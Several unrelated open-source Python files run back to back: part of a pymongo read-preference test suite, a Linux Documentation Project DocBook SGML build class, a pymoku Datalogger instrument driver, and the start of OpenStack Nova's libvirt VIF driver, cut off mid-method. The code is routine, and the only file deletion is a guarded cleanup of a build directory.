def test_drop_collection(self):
self._test_primary_helper(
lambda: self.c.pymongo_test.drop_collection('some_collection'))
self._test_primary_helper(
lambda: self.c.pymongo_test.some_collection.drop())
def test_group(self):
self._test_coll_helper(True, self.c.pymongo_test.test, 'group',
{'a': 1}, {}, {}, 'function() { }')
def test_map_reduce(self):
self._test_coll_helper(False, self.c.pymongo_test.test, 'map_reduce',
'function() { }', 'function() { }',
{'inline': 1})
def test_inline_map_reduce(self):
self._test_coll_helper(True, self.c.pymongo_test.test,
'inline_map_reduce',
'function() { }', 'function() { }')
def test_count(self):
self._test_coll_helper(True, self.c.pymongo_test.test, 'count')
def test_distinct(self):
self._test_coll_helper(True, self.c.pymongo_test.test, 'distinct', 'a')
def test_aggregate(self):
if self.client_version.at_least(2, 1, 0):
self._test_coll_helper(True, self.c.pymongo_test.test,
'aggregate',
[{'$project': {'_id': 1}}])
class TestMovingAverage(unittest.TestCase):
def test_moving_average(self):
avg = MovingAverage()
self.assertIsNone(avg.get())
avg.add_sample(10)
self.assertAlmostEqual(10, avg.get())
avg.add_sample(20)
self.assertAlmostEqual(12, avg.get())
avg.add_sample(30)
self.assertAlmostEqual(15.6, avg.get())
class TestMongosAndReadPreference(unittest.TestCase):
def test_read_preference_document(self):
pref = Primary()
self.assertEqual(
pref.document,
{'mode': 'primary'})
pref = PrimaryPreferred()
self.assertEqual(
pref.document,
{'mode': 'primaryPreferred'})
pref = PrimaryPreferred(tag_sets=[{'dc': 'sf'}])
self.assertEqual(
pref.document,
{'mode': 'primaryPreferred', 'tags': [{'dc': 'sf'}]})
pref = PrimaryPreferred(
tag_sets=[{'dc': 'sf'}], max_staleness=30)
self.assertEqual(
pref.document,
{'mode': 'primaryPreferred',
'tags': [{'dc': 'sf'}],
'maxStalenessSeconds': 30})
pref = Secondary()
self.assertEqual(
pref.document,
{'mode': 'secondary'})
pref = Secondary(tag_sets=[{'dc': 'sf'}])
self.assertEqual(
pref.document,
{'mode': 'secondary', 'tags': [{'dc': 'sf'}]})
pref = Secondary(
tag_sets=[{'dc': 'sf'}], max_staleness=30)
self.assertEqual(
pref.document,
{'mode': 'secondary',
'tags': [{'dc': 'sf'}],
'maxStalenessSeconds': 30})
pref = SecondaryPreferred()
self.assertEqual(
pref.document,
{'mode': 'secondaryPreferred'})
pref = SecondaryPreferred(tag_sets=[{'dc': 'sf'}])
self.assertEqual(
pref.document,
{'mode': 'secondaryPreferred', 'tags': [{'dc': 'sf'}]})
pref = SecondaryPreferred(
tag_sets=[{'dc': 'sf'}], max_staleness=30)
self.assertEqual(
pref.document,
{'mode': 'secondaryPreferred',
'tags': [{'dc': 'sf'}],
'maxStalenessSeconds': 30})
pref = Nearest()
self.assertEqual(
pref.document,
{'mode': 'nearest'})
pref = Nearest(tag_sets=[{'dc': 'sf'}])
self.assertEqual(
pref.document,
{'mode': 'nearest', 'tags': [{'dc': 'sf'}]})
pref = Nearest(
tag_sets=[{'dc': 'sf'}], max_staleness=30)
self.assertEqual(
pref.document,
{'mode': 'nearest',
'tags': [{'dc': 'sf'}],
'maxStalenessSeconds': 30})
with self.assertRaises(TypeError):
Nearest(max_staleness=1.5) # Float is prohibited.
with self.assertRaises(ValueError):
Nearest(max_staleness=0)
with self.assertRaises(ValueError):
Nearest(max_staleness=-2)
def test_maybe_add_read_preference(self):
# Primary doesn't add $readPreference
out = _maybe_add_read_preference({}, Primary())
self.assertEqual(out, {})
pref = PrimaryPreferred()
out = _maybe_add_read_preference({}, pref)
self.assertEqual(
out, SON([("$query", {}), ("$readPreference", pref.document)]))
pref = PrimaryPreferred(tag_sets=[{'dc': 'nyc'}])
out = _maybe_add_read_preference({}, pref)
self.assertEqual(
out, SON([("$query", {}), ("$readPreference", pref.document)]))
pref = Secondary()
out = _maybe_add_read_preference({}, pref)
self.assertEqual(
out, SON([("$query", {}), ("$readPreference", pref.document)]))
pref = Secondary(tag_sets=[{'dc': 'nyc'}])
out = _maybe_add_read_preference({}, pref)
self.assertEqual(
out, SON([("$query", {}), ("$readPreference", pref.document)]))
# SecondaryPreferred without tag_sets or max_staleness doesn't add
# $readPreference
pref = SecondaryPreferred()
out = _maybe_add_read_preference({}, pref)
self.assertEqual(out, {})
pref = SecondaryPreferred(tag_sets=[{'dc': 'nyc'}])
out = _maybe_add_read_preference({}, pref)
self.assertEqual(
out, SON([("$query", {}), ("$readPreference", pref.document)]))
pref = SecondaryPreferred(max_staleness=120)
out = _maybe_add_read_preference({}, pref)
self.assertEqual(
out, SON([("$query", {}), ("$readPreference", pref.document)]))
pref = Nearest()
out = _maybe_add_read_preference({}, pref)
self.assertEqual(
out, SON([("$query", {}), ("$readPreference", pref.document)]))
pref = Nearest(tag_sets=[{'dc': 'nyc'}])
out = _maybe_add_read_preference({}, pref)
self.assertEqual(
out, SON([("$query", {}), ("$readPreference", pref.document)]))
criteria = SON([("$query", {}), ("$orderby", SON([("_id", 1)]))])
pref = Nearest()
out = _maybe_add_read_preference(criteria, pref)
self.assertEqual(
out,
SON([("$query", {}),
("$orderby", SON([("_id", 1)])),
("$readPreference", pref.document)]))
pref = Nearest(tag_sets=[{'dc': 'nyc'}])
out = _maybe_add_read_preference(criteria, pref)
self.assertEqual(
out,
SON([("$query", {}),
("$orderby", SON([("_id", 1)])),
("$readPreference", pref.document)]))
@client_context.require_mongos
def test_mongos(self):
shard = client_context.client.config.shards.find_one()['host']
num_members = shard.count(',') + 1
if num_members == 1:
raise SkipTest("Need a replica set shard to test.")
coll = client_context.client.pymongo_test.get_collection(
"test",
write_concern=WriteConcern(w=num_members))
coll.drop()
res = coll.insert_many([{} for _ in range(5)])
first_id = res.inserted_ids[0]
last_id = res.inserted_ids[-1]
# Note - this isn't a perfect test since there's no way to
# tell what shard member a query ran on.
for pref in (Primary(),
PrimaryPreferred(),
Secondary(),
SecondaryPreferred(),
Nearest()):
qcoll = coll.with_options(read_preference=pref)
results = list(qcoll.find().sort([("_id", 1)]))
self.assertEqual(first_id, results[0]["_id"])
self.assertEqual(last_id, results[-1]["_id"])
results = list(qcoll.find().sort([("_id", -1)]))
self.assertEqual(first_id, results[-1]["_id"])
self.assertEqual(last_id, results[0]["_id"])
@client_context.require_mongos
@client_context.require_version_min(3, 3, 12)
def test_mongos_max_staleness(self):
# Sanity check that we're sending maxStalenessSeconds
coll = client_context.client.pymongo_test.get_collection(
"test", read_preference=SecondaryPreferred(max_staleness=120))
# No error
coll.find_one()
coll = client_context.client.pymongo_test.get_collection(
"test", read_preference=SecondaryPreferred(max_staleness=10))
try:
coll.find_one()
except OperationFailure as exc:
self.assertEqual(160, exc.code)
else:
self.fail("mongos accepted invalid staleness")
coll = single_client(
readPreference='secondaryPreferred',
maxStalenessSeconds=120).pymongo_test.test
# No error
coll.find_one()
coll = single_client(
readPreference='secondaryPreferred',
maxStalenessSeconds=10).pymongo_test.test
try:
coll.find_one()
except OperationFailure as exc:
self.assertEqual(160, exc.code)
else:
self.fail("mongos accepted invalid staleness")
if __name__ == "__main__":
unittest.main()
| |
#! /usr/bin/python
# -*- coding: utf8 -*-
#
# Copyright (c) 2016 Linux Documentation Project
from __future__ import absolute_import, division, print_function
from __future__ import unicode_literals
import os
import logging
from tldp.utils import which, firstfoundfile
from tldp.utils import arg_isexecutable, isexecutable
from tldp.utils import arg_isreadablefile, isreadablefile
from tldp.doctypes.common import BaseDoctype, SignatureChecker, depends
logger = logging.getLogger(__name__)
def docbookdsl_finder():
locations = [
'/usr/share/sgml/docbook/stylesheet/dsssl/modular/html/docbook.dsl',
'/usr/share/sgml/docbook/dsssl-stylesheets/html/docbook.dsl',
]
return firstfoundfile(locations)
def ldpdsl_finder():
locations = [
'/usr/share/sgml/docbook/stylesheet/dsssl/ldp/ldp.dsl',
]
return firstfoundfile(locations)
class DocbookSGML(BaseDoctype, SignatureChecker):
formatname = 'DocBook SGML 3.x/4.x'
extensions = ['.sgml']
signatures = ['-//Davenport//DTD DocBook V3.0//EN',
'-//OASIS//DTD DocBook V3.1//EN',
'-//OASIS//DTD DocBook V4.1//EN',
'-//OASIS//DTD DocBook V4.2//EN', ]
required = {'docbooksgml_jw': isexecutable,
'docbooksgml_openjade': isexecutable,
'docbooksgml_dblatex': isexecutable,
'docbooksgml_html2text': isexecutable,
'docbooksgml_collateindex': isexecutable,
'docbooksgml_ldpdsl': isreadablefile,
'docbooksgml_docbookdsl': isreadablefile,
}
def make_blank_indexsgml(self, **kwargs):
indexsgml = os.path.join(self.source.dirname, 'index.sgml')
self.indexsgml = os.path.isfile(indexsgml)
if self.indexsgml:
return True
'''generate an empty index.sgml file (in output dir)'''
s = '''"{config.docbooksgml_collateindex}" \\
-N \\
-o \\
"index.sgml"'''
return self.shellscript(s, **kwargs)
@depends(make_blank_indexsgml)
def move_blank_indexsgml_into_source(self, **kwargs):
'''move a blank index.sgml file into the source tree'''
if self.indexsgml:
return True
s = '''mv \\
--no-clobber \\
--verbose \\
-- "index.sgml" "{source.dirname}/index.sgml"'''
indexsgml = os.path.join(self.source.dirname, 'index.sgml')
if not self.config.script:
self.removals.add(indexsgml)
return self.shellscript(s, **kwargs)
@depends(move_blank_indexsgml_into_source)
def make_data_indexsgml(self, **kwargs):
'''collect document's index entries into a data file (HTML.index)'''
if self.indexsgml:
return True
s = '''"{config.docbooksgml_openjade}" \\
-t sgml \\
-V html-index \\
-d "{config.docbooksgml_docbookdsl}" \\
"{source.filename}"'''
return self.shellscript(s, **kwargs)
@depends(make_data_indexsgml)
def make_indexsgml(self, **kwargs):
'''generate the final document index file (index.sgml)'''
if self.indexsgml:
return True
s = '''"{config.docbooksgml_collateindex}" \\
-g \\
-t Index \\
-i doc-index \\
-o "index.sgml" \\
"HTML.index" \\
"{source.filename}"'''
return self.shellscript(s, **kwargs)
@depends(make_indexsgml)
def move_indexsgml_into_source(self, **kwargs):
'''move the generated index.sgml file into the source tree'''
if self.indexsgml:
return True
indexsgml = os.path.join(self.source.dirname, 'index.sgml')
s = '''mv \\
--verbose \\
--force \\
-- "index.sgml" "{source.dirname}/index.sgml"'''
logger.debug("%s creating %s", self.source.stem, indexsgml)
if not self.config.script:
self.removals.add(indexsgml)
return self.shellscript(s, **kwargs)
@depends(move_indexsgml_into_source)
def cleaned_indexsgml(self, **kwargs):
'''clean the junk from the output dir after building the index.sgml'''
# -- be super cautious before removing a bunch of files
if not self.config.script:
cwd = os.getcwd()
if not os.path.samefile(cwd, self.output.dirname):
logger.error("%s (cowardly) refusing to clean directory %s",
self.source.stem, cwd)
logger.error("%s expected to find %s",
self.source.stem, self.output.dirname)
return False
preserve = os.path.basename(self.output.MD5SUMS)
s = '''find . -mindepth 1 -maxdepth 1 -not -type d -not -name {} -delete -print'''
s = s.format(preserve)
return self.shellscript(s, **kwargs)
@depends(cleaned_indexsgml)
def make_htmls(self, **kwargs):
'''create a single page HTML output (with incorrect name)'''
s = '''"{config.docbooksgml_jw}" \\
-f docbook \\
-b html \\
--dsl "{config.docbooksgml_ldpdsl}#html" \\
-V nochunks \\
-V '%callout-graphics-path%=images/callouts/' \\
-V '%stock-graphics-extension%=.png' \\
--output . \\
"{source.filename}"'''
return self.shellscript(s, **kwargs)
@depends(make_htmls)
def make_name_htmls(self, **kwargs):
'''correct the single page HTML output name'''
s = 'mv -v --no-clobber -- "{output.name_html}" "{output.name_htmls}"'
return self.shellscript(s, **kwargs)
@depends(make_name_htmls)
def make_name_txt(self, **kwargs):
'''create text output (from single-page HTML)'''
s = '''"{config.docbooksgml_html2text}" > "{output.name_txt}" \\
-style pretty \\
-nobs \\
"{output.name_htmls}"'''
return self.shellscript(s, **kwargs)
def make_pdf_with_jw(self, **kwargs):
'''use jw (openjade) to create a PDF'''
s = '''"{config.docbooksgml_jw}" \\
-f docbook \\
-b pdf \\
--output . \\
"{source.filename}"'''
return self.shellscript(s, **kwargs)
def make_pdf_with_dblatex(self, **kwargs):
'''use dblatex (fallback) to create a PDF'''
s = '''"{config.docbooksgml_dblatex}" \\
-F sgml \\
-t pdf \\
-o "{output.name_pdf}" \\
"{source.filename}"'''
return self.shellscript(s, **kwargs)
@depends(cleaned_indexsgml)
def make_name_pdf(self, **kwargs):
stem = self.source.stem
classname = self.__class__.__name__
logger.info("%s calling method %s.%s",
stem, classname, 'make_pdf_with_jw')
if self.make_pdf_with_jw(**kwargs):
return True
logger.error("%s jw failed creating PDF, falling back to dblatex...",
stem)
logger.info("%s calling method %s.%s",
stem, classname, 'make_pdf_with_dblatex')
return self.make_pdf_with_dblatex(**kwargs)
@depends(make_name_htmls)
def make_html(self, **kwargs):
'''create chunked HTML outputs'''
s = '''"{config.docbooksgml_jw}" \\
-f docbook \\
-b html \\
--dsl "{config.docbooksgml_ldpdsl}#html" \\
-V '%callout-graphics-path%=images/callouts/' \\
-V '%stock-graphics-extension%=.png' \\
--output . \\
"{source.filename}"'''
return self.shellscript(s, **kwargs)
@depends(make_html)
def make_name_html(self, **kwargs):
'''rename openjade's index.html to LDP standard name STEM.html'''
s = 'mv -v --no-clobber -- "{output.name_indexhtml}" "{output.name_html}"'
return self.shellscript(s, **kwargs)
@depends(make_name_html)
def make_name_indexhtml(self, **kwargs):
'''create final index.html symlink'''
s = 'ln -svr -- "{output.name_html}" "{output.name_indexhtml}"'
return self.shellscript(s, **kwargs)
@classmethod
def argparse(cls, p):
descrip = 'executables and data files for %s' % (cls.formatname,)
g = p.add_argument_group(title=cls.__name__, description=descrip)
g.add_argument('--docbooksgml-docbookdsl', type=arg_isreadablefile,
default=docbookdsl_finder(),
help='full path to html/docbook.dsl [%(default)s]')
g.add_argument('--docbooksgml-ldpdsl', type=arg_isreadablefile,
default=ldpdsl_finder(),
help='full path to ldp/ldp.dsl [%(default)s]')
g.add_argument('--docbooksgml-jw', type=arg_isexecutable,
default=which('jw'),
help='full path to jw [%(default)s]')
g.add_argument('--docbooksgml-html2text', type=arg_isexecutable,
default=which('html2text'),
help='full path to html2text [%(default)s]')
g.add_argument('--docbooksgml-openjade', type=arg_isexecutable,
default=which('openjade'),
help='full path to openjade [%(default)s]')
g.add_argument('--docbooksgml-dblatex', type=arg_isexecutable,
default=which('dblatex'),
help='full path to dblatex [%(default)s]')
g.add_argument('--docbooksgml-collateindex', type=arg_isexecutable,
default=which('collateindex.pl'),
help='full path to collateindex [%(default)s]')
#
# -- end of file
| |
from ._instrument import ADC_SMP_RATE
from ._instrument import CHN_BUFLEN
from ._instrument import ROLL
from ._instrument import needs_commit
from ._instrument import log
from ._instrument import to_reg_unsigned, from_reg_unsigned
from . import _stream_instrument
from . import _waveform_generator
from . import _utils
REG_DL_OUTSEL = 64
REG_DL_ACTL = 66
REG_DL_DECIMATION = 65
# REG_DL_OUTSEL constants
_DL_SOURCE_ADC1 = 0
_DL_SOURCE_ADC2 = 1
_DL_SOURCE_DAC1 = 2
_DL_SOURCE_DAC2 = 3
_DL_SOURCE_EXT = 4
_DL_LB_ROUND = 0
_DL_LB_CLIP = 1
_DL_AIN_DDS = 0
_DL_AIN_DECI = 1
_DL_ADC_SMPS = ADC_SMP_RATE
_DL_BUFLEN = CHN_BUFLEN
_DL_SCREEN_WIDTH = 1024
_DL_ROLL = ROLL
_DL_SAMPLERATE_MIN = 10 # Smp/s
_DL_SAMPLERATE_MAX = _DL_ADC_SMPS # 500MSmp/s
class Datalogger(_stream_instrument.StreamBasedInstrument,
_waveform_generator.BasicWaveformGenerator):
""" Datalogger instrument object.
To run a new Datalogger instrument, this should be instantiated and
deployed via a connected
:any:`Moku` object using :any:`deploy_instrument`. Alternatively,
a pre-configured instrument object
can be obtained by discovering an already running Datalogger instrument
on a Moku:Lab device via
:any:`discover_instrument`.
.. automethod:: pymoku.instruments.Datalogger.__init__
.. attribute:: type
:annotation: = "datalogger"
Name of this instrument.
"""
def __init__(self):
"""Create a new Datalogger instrument, ready to deploy to a Moku.
"""
super(Datalogger, self).__init__()
self._register_accessors(_dl_reg_handlers)
self.id = 7
self.type = "datalogger"
self.calibration = None
# TODO: Allow user to disable logging of either channel
self.logname = "MokuDataloggerData"
self.binstr = "<s32"
self.procstr = ['', '']
self.hdrstr = ''
self.fmtstr = ''
self.timestep = 1
@needs_commit
def set_defaults(self):
# Force X-Mode to be "roll" for streaming
super(Datalogger, self).set_defaults()
self.x_mode = _DL_ROLL
self.set_samplerate(1e3)
self.framerate = 0
# Disable the waveform generator by default
# TODO: Disable without using a gen_ function
self.gen_off()
self.set_source(1, 'in1')
self.set_source(2, 'in2')
self.set_precision_mode(False)
self._set_pause(False)
self.set_frontend(1, fiftyr=True, atten=False, ac=False)
self.set_frontend(2, fiftyr=True, atten=False, ac=False)
self.en_in_ch1 = True
self.en_in_ch2 = True
@needs_commit
def set_samplerate(self, samplerate):
""" Manually set the sample rate of the instrument.
This interface allows you to specify the rate at which data is sampled.
.. note::
The samplerate must be set to within the allowed range for your
datalogging session type.
See the Datalogger instrument tutorial for more details.
:type samplerate: float; *0 < samplerate < 500Msmp/s*
:param samplerate: Target samples per second. Will get rounded to the
nearest unit.
:raises ValueOutOfRangeException: if samplerate is out of range.
"""
_utils.check_parameter_valid('range', samplerate,
[_DL_SAMPLERATE_MIN, _DL_SAMPLERATE_MAX],
'samplerate', 'Hz'
)
decimation = _DL_ADC_SMPS / float(samplerate)
self.decimation_rate = decimation
self.timestep = 1.0 / (_DL_ADC_SMPS / decimation)
def get_samplerate(self):
""" :return: The current instrument sample rate """
if(self.decimation_rate == 0):
log.warning("Decimation rate appears to be unset.")
return _DL_ADC_SMPS
return _DL_ADC_SMPS / float(self.decimation_rate)
@needs_commit
def set_precision_mode(self, state):
""" Change aquisition mode between downsampling and decimation.
Precision mode, a.k.a Decimation, samples at full rate and applies a
low-pass filter to the data. This improves
precision. Normal mode works by direct downsampling, throwing away
points it doesn't need.
:param state: Select Precision Mode
:type state: bool
:raises ValueError: if input parameter is invalid
"""
_utils.check_parameter_valid('bool', state, desc='precision mode')
self.ain_mode = _DL_AIN_DECI if state else _DL_AIN_DDS
def is_precision_mode(self):
return self.ain_mode is _DL_AIN_DECI
@needs_commit
def set_source(self, ch, source, lmode='round'):
""" Sets the source of the channel data to either the analog input or
internally looped-back digital output.
This feature allows the user to capture the Waveform Generator outputs.
:type ch: int; {1,2}
:param ch: Channel Number
:type source: string, {'in1', 'in2', 'out1','out2', 'ext'}
:param source: Where the specified channel should source data from
(either the input or internally looped back output)
:type lmode: string, {'clip','round'}
:param lmode: DAC Loopback mode (ignored 'in' sources)
:raises ValueOutOfRangeException: if the channel number is incorrect
:raises ValueError: if any of the string parameters are incorrect
"""
_str_to_lmode = {
'round': _DL_LB_ROUND,
'clip': _DL_LB_CLIP
}
_str_to_channel_data_source = {
'in1': _DL_SOURCE_ADC1,
'in2': _DL_SOURCE_ADC2,
'out1': _DL_SOURCE_DAC1,
'out2': _DL_SOURCE_DAC2,
'ext': _DL_SOURCE_EXT
}
_utils.check_parameter_valid('set', ch, [1, 2], 'channel')
source = _utils.str_to_val(_str_to_channel_data_source, source,
'channel data source')
lmode = _utils.str_to_val(_str_to_lmode, lmode, 'DAC loopback mode')
if ch == 1:
self.source_ch1 = source
if source in [_DL_SOURCE_DAC1, _DL_SOURCE_DAC2]:
self.loopback_mode_ch1 = lmode
elif ch == 2:
self.source_ch2 = source
if source in [_DL_SOURCE_DAC1, _DL_SOURCE_DAC2]:
self.loopback_mode_ch2 = lmode
def _update_datalogger_params(self):
scales = self._calculate_scales()
samplerate = self.get_samplerate()
self.timestep = 1.0 / samplerate
# Use the new scales to decide on the processing string
self.procstr[0] = "*{:.15f}".format(scales['scale_ch1'])
self.procstr[1] = "*{:.15f}".format(scales['scale_ch2'])
self.fmtstr = self._get_fmtstr(self.ch1, self.ch2)
self.hdrstr = self._get_hdrstr(self.ch1, self.ch2)
def _on_reg_sync(self):
super(Datalogger, self)._on_reg_sync()
if self.decimation_rate == 0:
self.timestep = 1.0 / (_DL_ADC_SMPS)
else:
samplerate = _DL_ADC_SMPS / float(self.decimation_rate)
self.timestep = 1.0 / samplerate
def _get_hdrstr(self, ch1, ch2):
chs = [ch1, ch2]
hdr = "% Moku:Datalogger\r\n"
for i, c in enumerate(chs):
if c:
r = self.get_frontend(i + 1)
hdr += ("% Ch {i} - {} coupling, {} Ohm impedance, "
"{} V range\r\n").format("AC" if r[2] else "DC",
"50" if r[0] else "1M",
"10" if r[1] else "1",
i=i + 1)
hdr += ("% Acquisition rate: {:.10e} Hz, "
"{} mode\r\n").format(self.get_samplerate(),
"Precision" if self.is_precision_mode()
else "Normal"
)
hdr += "% {} 10 MHz clock\r\n".format(
"External"
if self._moku._get_actual_extclock()
else "Internal"
)
hdr += "% Acquired {}\r\n".format(_utils.formatted_timestamp())
hdr += "% Time"
for i, c in enumerate(chs):
if c:
hdr += ", Ch {i} voltage (V)".format(i=i + 1)
hdr += "\r\n"
return hdr
def _get_fmtstr(self, ch1, ch2):
chs = [ch1, ch2]
fmtstr = "{t:.10e}"
for i, c in enumerate(chs):
if c:
fmtstr += ",{{ch{i}:.10e}}".format(i=i + 1)
fmtstr += "\r\n"
return fmtstr
def _deci_gain(self):
if self.decimation_rate == 0:
return 1
if self.decimation_rate < 2**20:
return self.decimation_rate
else:
return self.decimation_rate / 2**10
def _calculate_scales(self):
g1, g2 = self._adc_gains()
d1, d2 = self._dac_gains()
gains = [g1, g2, d1, d2, 2.0**-11]
l1 = self.loopback_mode_ch1
l2 = self.loopback_mode_ch2
s1 = self.source_ch1
s2 = self.source_ch2
scale_ch1 = gains[s1]
scale_ch2 = gains[s2]
if self.ain_mode == _DL_AIN_DECI:
scale_ch1 /= self._deci_gain()
scale_ch2 /= self._deci_gain()
def _compute_total_scaling_factor(adc, dac, src, lmode):
# Change scaling factor depending on the source type
if src in [_DL_SOURCE_ADC1, _DL_SOURCE_ADC2]:
scale = 1.0
elif src in [_DL_SOURCE_DAC1, _DL_SOURCE_DAC2]:
if(lmode == _DL_LB_CLIP):
scale = 1.0
else: # Rounding mode
scale = 16.0
else:
log.error("Invalid source type on channel.")
return
return scale
# These are the combined scaling factors for both channel 1
# and channel 2 raw data
scale_ch1 *= _compute_total_scaling_factor(g1, d1, s1, l1)
scale_ch2 *= _compute_total_scaling_factor(g2, d2, s2, l2)
return {'scale_ch1': scale_ch1,
'scale_ch2': scale_ch2,
'gain_adc1': g1,
'gain_adc2': g2,
'gain_dac1': d1,
'gain_dac2': d2,
'source_ch1': s1,
'source_ch2': s2,
'gain_loopback1': l1,
'gain_loopback2': l2
}
_dl_reg_handlers = {
'source_ch1':
(REG_DL_OUTSEL,
to_reg_unsigned(0, 8, allow_set=[_DL_SOURCE_ADC1,
_DL_SOURCE_ADC2,
_DL_SOURCE_DAC1,
_DL_SOURCE_DAC2,
_DL_SOURCE_EXT]),
from_reg_unsigned(0, 8)),
'source_ch2':
(REG_DL_OUTSEL,
to_reg_unsigned(8, 8, allow_set=[_DL_SOURCE_ADC1,
_DL_SOURCE_ADC2,
_DL_SOURCE_DAC1,
_DL_SOURCE_DAC2,
_DL_SOURCE_EXT]),
from_reg_unsigned(8, 8)),
'loopback_mode_ch1':
(REG_DL_ACTL,
to_reg_unsigned(0, 1, allow_set=[_DL_LB_CLIP,
_DL_LB_ROUND]),
from_reg_unsigned(0, 1)),
'loopback_mode_ch2':
(REG_DL_ACTL,
to_reg_unsigned(1, 1, allow_set=[_DL_LB_CLIP,
_DL_LB_ROUND]),
from_reg_unsigned(1, 1)),
'ain_mode':
(REG_DL_ACTL,
to_reg_unsigned(16, 2, allow_set=[_DL_AIN_DDS,
_DL_AIN_DECI]),
from_reg_unsigned(16, 2)),
'decimation_rate':
(REG_DL_DECIMATION,
to_reg_unsigned(0, 32),
from_reg_unsigned(0, 32))
}
| |
# Copyright (C) 2011 Midokura KK
# Copyright (C) 2011 Nicira, Inc
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""VIF drivers for libvirt."""
import copy
import os
from oslo_concurrency import processutils
from oslo_config import cfg
from oslo_log import log as logging
from nova import exception
from nova.i18n import _
from nova.i18n import _LE
from nova.network import linux_net
from nova.network import model as network_model
from nova import objects
from nova import utils
from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import designer
LOG = logging.getLogger(__name__)
libvirt_vif_opts = [
cfg.BoolOpt('use_virtio_for_bridges',
default=True,
help='Use virtio for bridge interfaces with KVM/QEMU'),
]
CONF = cfg.CONF
CONF.register_opts(libvirt_vif_opts, 'libvirt')
CONF.import_opt('use_ipv6', 'nova.netconf')
DEV_PREFIX_ETH = 'eth'
# vhostuser queues support
MIN_LIBVIRT_VHOSTUSER_MQ = (1, 2, 17)
def is_vif_model_valid_for_virt(virt_type, vif_model):
valid_models = {
'qemu': [network_model.VIF_MODEL_VIRTIO,
network_model.VIF_MODEL_NE2K_PCI,
network_model.VIF_MODEL_PCNET,
network_model.VIF_MODEL_RTL8139,
network_model.VIF_MODEL_E1000,
network_model.VIF_MODEL_SPAPR_VLAN],
'kvm': [network_model.VIF_MODEL_VIRTIO,
network_model.VIF_MODEL_NE2K_PCI,
network_model.VIF_MODEL_PCNET,
network_model.VIF_MODEL_RTL8139,
network_model.VIF_MODEL_E1000,
network_model.VIF_MODEL_SPAPR_VLAN],
'xen': [network_model.VIF_MODEL_NETFRONT,
network_model.VIF_MODEL_NE2K_PCI,
network_model.VIF_MODEL_PCNET,
network_model.VIF_MODEL_RTL8139,
network_model.VIF_MODEL_E1000],
'lxc': [],
'uml': [],
}
if vif_model is None:
return True
if virt_type not in valid_models:
raise exception.UnsupportedVirtType(virt=virt_type)
return vif_model in valid_models[virt_type]
class LibvirtGenericVIFDriver(object):
"""Generic VIF driver for libvirt networking."""
def _normalize_vif_type(self, vif_type):
return vif_type.replace('2.1q', '2q')
def get_vif_devname(self, vif):
if 'devname' in vif:
return vif['devname']
return ("nic" + vif['id'])[:network_model.NIC_NAME_LEN]
def get_vif_devname_with_prefix(self, vif, prefix):
devname = self.get_vif_devname(vif)
return prefix + devname[3:]
def get_base_config(self, instance, vif, image_meta,
inst_type, virt_type):
conf = vconfig.LibvirtConfigGuestInterface()
# Default to letting libvirt / the hypervisor choose the model
model = None
driver = None
vhost_queues = None
# If the user has specified a 'vif_model' against the
# image then honour that model
if image_meta:
vif_model = image_meta.properties.get('hw_vif_model')
if vif_model is not None:
model = vif_model
# Else if the virt type is KVM/QEMU, use virtio according
# to the global config parameter
if (model is None and
virt_type in ('kvm', 'qemu') and
CONF.libvirt.use_virtio_for_bridges):
model = network_model.VIF_MODEL_VIRTIO
# Workaround libvirt bug, where it mistakenly
# enables vhost mode, even for non-KVM guests
if (model == network_model.VIF_MODEL_VIRTIO and
virt_type == "qemu"):
driver = "qemu"
if not is_vif_model_valid_for_virt(virt_type,
model):
raise exception.UnsupportedHardware(model=model,
virt=virt_type)
if (virt_type == 'kvm' and
model == network_model.VIF_MODEL_VIRTIO):
vhost_drv, vhost_queues = self._get_virtio_mq_settings(image_meta,
inst_type)
driver = vhost_drv or driver
designer.set_vif_guest_frontend_config(
conf, vif['address'], model, driver, vhost_queues)
return conf
def _get_virtio_mq_settings(self, image_meta, flavor):
"""A methods to set the number of virtio queues,
if it has been requested in extra specs.
"""
driver = None
vhost_queues = None
if not isinstance(image_meta, objects.ImageMeta):
image_meta = objects.ImageMeta.from_dict(image_meta)
img_props = image_meta.properties
if img_props.get('hw_vif_multiqueue_enabled'):
driver = 'vhost'
vhost_queues = flavor.vcpus
return (driver, vhost_queues)
def get_bridge_name(self, vif):
return vif['network']['bridge']
def get_ovs_interfaceid(self, vif):
return vif.get('ovs_interfaceid') or vif['id']
def get_br_name(self, iface_id):
return ("qbr" + iface_id)[:network_model.NIC_NAME_LEN]
def get_veth_pair_names(self, iface_id):
return (("qvb%s" % iface_id)[:network_model.NIC_NAME_LEN],
("qvo%s" % iface_id)[:network_model.NIC_NAME_LEN])
def get_firewall_required(self, vif):
if vif.is_neutron_filtering_enabled():
return False
if CONF.firewall_driver != "nova.virt.firewall.NoopFirewallDriver":
return True
return False
def get_config_bridge(self, instance, vif, image_meta,
inst_type, virt_type, host):
"""Get VIF configurations for bridge type."""
conf = self.get_base_config(instance, vif, image_meta,
inst_type, virt_type)
designer.set_vif_host_backend_bridge_config(
conf, self.get_bridge_name(vif),
self.get_vif_devname(vif))
mac_id = vif['address'].replace(':', '')
name = "nova-instance-" + instance.name + "-" + mac_id
if self.get_firewall_required(vif):
conf.filtername = name
designer.set_vif_bandwidth_config(conf, inst_type)
return conf
def get_config_ovs_bridge(self, instance, vif, image_meta,
inst_type, virt_type, host):
conf = self.get_base_config(instance, vif, image_meta,
inst_type, virt_type)
designer.set_vif_host_backend_ovs_config(
conf, self.get_bridge_name(vif),
self.get_ovs_interfaceid(vif),
self.get_vif_devname(vif))
designer.set_vif_bandwidth_config(conf, inst_type)
return conf
def get_config_ovs_hybrid(self, instance, vif, image_meta,
inst_type, virt_type, host):
newvif = copy.deepcopy(vif)
newvif['network']['bridge'] = self.get_br_name(vif['id'])
return self.get_config_bridge(instance, newvif, image_meta,
inst_type, virt_type, host)
def get_config_ovs(self, instance, vif, image_meta,
inst_type, virt_type, host):
if self.get_firewall_required(vif) or vif.is_hybrid_plug_enabled():
return self.get_config_ovs_hybrid(instance, vif,
image_meta,
inst_type,
virt_type,
host)
else:
return self.get_config_ovs_bridge(instance, vif,
image_meta,
inst_type,
